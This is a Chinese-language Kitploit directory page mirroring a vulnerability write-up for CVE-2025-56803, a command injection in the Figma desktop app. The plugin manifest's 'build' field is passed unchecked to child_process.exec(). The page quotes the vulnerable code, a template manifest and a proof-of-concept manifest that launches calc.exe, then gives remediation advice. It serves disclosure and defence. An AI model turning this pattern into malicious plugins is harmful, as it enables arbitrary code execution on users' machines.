Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-56803 — 通过 Figma 桌面应用程序中的插件执行导致的操作系统命令注入漏洞 | Kitploit
工具/GitHubGitHub/yosasasutsut/cve-2025-56803
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubyosasasutsut/cve-2025-56803

CVE-2025-56803

通过 Figma 桌面应用程序中的插件执行导致的操作系统命令注入漏洞

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-56803

Figma桌面应用程序中的插件执行OS命令注入漏洞

1. 概述

Figma Icon
  • 应用程序:Figma桌面应用程序
  • 版本:125.6.5
  • 供应商:Figma, Inc.
  • CWE:CWE-78:OS命令中特殊元素的不当中和('OS命令注入')
  • CVSS:8.4
  • 向量字符串:CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

2. 摘要

Figma桌面应用程序(v125.6.5)在插件加载器中存在命令注入漏洞。
恶意插件清单(manifest.json)可以滥用build字段,该字段未经验证直接传递给child_process.exec()。
这导致插件加载后立即执行任意OS命令,没有安全警告或提示。

3. 详细信息

漏洞源于main.js中的代码,它导入了Node.js内置的child_process模块:

root@kitploit:~
Zlt = require("child_process")

稍后,如果插件的manifest.json文件中存在build字段且其值为字符串,应用程序将使用child_process.exec()直接执行该值,没有任何清理或验证:

root@kitploit:~
if (
  s.build &&
  typeof s.build === "string" &&
  (l.path = process.env.PATH || "",
  await new Promise((g) => {
    (0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
      l.stdout = I;
      l.stderr = P;
      y && (l.buildErrCode = y.code);
      g();
    });
  }),
  l.buildErrCode
)
  return l;

因此,恶意插件中包含的以下manifest.json文件会导致build字段的值作为OS命令执行:

root@kitploit:~
{
  "name": "<NAME>",
  "id": "<ID>",
  "api": "1.0.0",
  "main": "code.js",
  "build": "<COMMAND>",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

此执行流程嵌入在Figma的插件处理逻辑中,并且main.js中包含require("child_process")调用确认命令执行直接构建在应用程序的核心逻辑中。

4. 概念验证(PoC)

通过运行包含以下恶意manifest.json的插件:

root@kitploit:~
{
  "name": "poc",
  "id": "1535549154235958412",
  "api": "1.0.0",
  "main": "code.js",
  "build": "calc.exe",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}

一旦此插件在Figma中注册并执行,指定的OS命令(calc.exe)将立即运行。

https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7

5. 建议

尽管build字段的执行是Figma桌面应用程序官方支持的功能,但应用程序应尽可能避免依赖manifest.json中的用户控制字段(如build)。
如果必须支持此类字段,则必须进行严格的输入验证以防止命令注入。
此外,应避免使用Node.js的child_process.exec(),而应采用更安全的替代方案,明确处理参数。

6. 参考

  • https://www.cve.org/CVERecord?id=CVE-2025-56803
  • https://nvd.nist.gov/vuln/detail/CVE-2025-56803
  • https://www.figma.com/plugin-docs/manifest/
下载工具